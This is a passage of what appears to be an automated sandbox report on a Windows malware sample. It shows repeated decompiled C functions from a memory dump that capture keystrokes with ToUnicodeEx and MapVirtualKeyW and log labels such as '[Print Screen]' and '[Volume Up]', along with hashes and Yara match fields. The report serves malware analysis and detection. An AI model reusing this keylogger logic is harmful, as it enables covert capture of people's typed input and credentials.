                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Scrol Lock]
                  • API String ID: 783433895-3106752957
                  • Opcode ID: 7d739420cde52f5cdf23b0552a77265f6848328848d1a0f3863d68950f1cd5c9
                  • Instruction ID: 538bcb97e9cdfd1a49afb72e3ad707114e7046f27a94ba55a28649c3e7b83c1d
                  • Opcode Fuzzy Hash: 7d739420cde52f5cdf23b0552a77265f6848328848d1a0f3863d68950f1cd5c9
                  • Instruction Fuzzy Hash: 7031C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E1000769A(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Sleep]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  Instruction address column for the listing above (range 0x1000769a to 0x100078b6)

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Sleep]
                  • API String ID: 783433895-3656392610
                  • Opcode ID: 4f42286bcb9d2d57705b4f68fa1ae7d45a5f494e57315e7dc3e0b652194aa4b2
                  • Instruction ID: 0f1bd7a52d7bab131bf13330daa87dc6c7aebe1a4c65384e0524c1501f8f18d4
                  • Opcode Fuzzy Hash: 4f42286bcb9d2d57705b4f68fa1ae7d45a5f494e57315e7dc3e0b652194aa4b2
                  • Instruction Fuzzy Hash: A031C2B8F042545BF722C7658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45C761
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100076A8(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Print Screen]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Print Screen]
                  • API String ID: 783433895-3743399299
                  • Opcode ID: 1ddbb06d12cae7f61712b76396317ea06106a7346feb82e8f9531a385193e155
                  • Instruction ID: ab27b4f068ad1f5cf43c9d8905a98d245769d77d18c34ebd10b41bde0b20419d
                  • Opcode Fuzzy Hash: 1ddbb06d12cae7f61712b76396317ea06106a7346feb82e8f9531a385193e155
                  • Instruction Fuzzy Hash: 8231C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489724ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100076B6(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Arrow Up]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Arrow Up]
                  • API String ID: 783433895-3327686714
                  • Opcode ID: 83203669f0511a29086e5a836e6f4c0065e3a22eefa3cde518e48db2ad99b6a3
                  • Instruction ID: b80a0d9e46f3fa67cf2931779c914642823d7e923a8a23d77be412dba9eacf16
                  • Opcode Fuzzy Hash: 83203669f0511a29086e5a836e6f4c0065e3a22eefa3cde518e48db2ad99b6a3
                  • Instruction Fuzzy Hash: 8631C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100076C4(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Volume Down]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Volume Down]
                  • API String ID: 783433895-1488893751
                  • Opcode ID: 304b93c83e960425b2644ed9c30a8069e95f38cdf27668f700968b4d8be163ed
                  • Instruction ID: 36b4c4fc11892ac8fc2660bbf295ac53e9d52ac89c47b39cb3f3571394c4b765
                  • Opcode Fuzzy Hash: 304b93c83e960425b2644ed9c30a8069e95f38cdf27668f700968b4d8be163ed
                  • Instruction Fuzzy Hash: 4D31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489724ECAB8EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100076D2(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Volume Mute]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Volume Mute]
                  • API String ID: 783433895-2344092975
                  • Opcode ID: 455afcd6e3832ca7b84d94a3bb7d8776a597c069f1cf387fb9e20d828b192e7e
                  • Instruction ID: 16984cad3dea769ffc9e719f0c3c6e6ae58df65779da4dd1961d81e5b5ee2c4d
                  • Opcode Fuzzy Hash: 455afcd6e3832ca7b84d94a3bb7d8776a597c069f1cf387fb9e20d828b192e7e
                  • Instruction Fuzzy Hash: 1231C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489724ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100076E0(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Volume Up]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
• Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
• Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
• Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Volume Up]
                  • API String ID: 783433895-1130620078
                  • Opcode ID: 1396860a42cb380e9acc2e04de6d3966a62f39ee4fc40e43a8010b9064b996bb
